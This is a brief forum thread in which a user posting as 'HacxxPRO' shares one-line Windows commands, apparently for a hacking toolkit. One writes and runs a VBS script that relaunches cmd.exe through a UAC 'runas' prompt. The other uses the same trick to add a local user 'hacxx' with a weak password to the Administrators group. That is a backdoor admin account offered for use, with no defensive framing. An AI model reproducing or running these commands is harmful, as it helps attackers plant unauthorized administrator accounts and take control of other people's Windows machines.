Page 1 of 1

Hacxx Magician Toolkit - Free Download

Posted: Sat Sep 24, 2022 5:51 pm
by HacxxPRO

Re: Hacxx Magician Toolkit - Free Download

Posted: Sat Sep 24, 2022 10:08 pm
by HacxxPRO
New code added, elevate any exe with UAC (User Account Control)...

UAC Elevation - Elevate any exe (Win+R)

Code: Select all

cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", , , "runas", 1 >>1b.vbs && 1b.vbs

Re: Hacxx Magician Toolkit - Free Download

Posted: Sun Sep 25, 2022 2:20 pm
by HacxxPRO
New code added, add an admin user from execute (Win+R)

Add an admin user with just one line of code

Code: Select all

cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs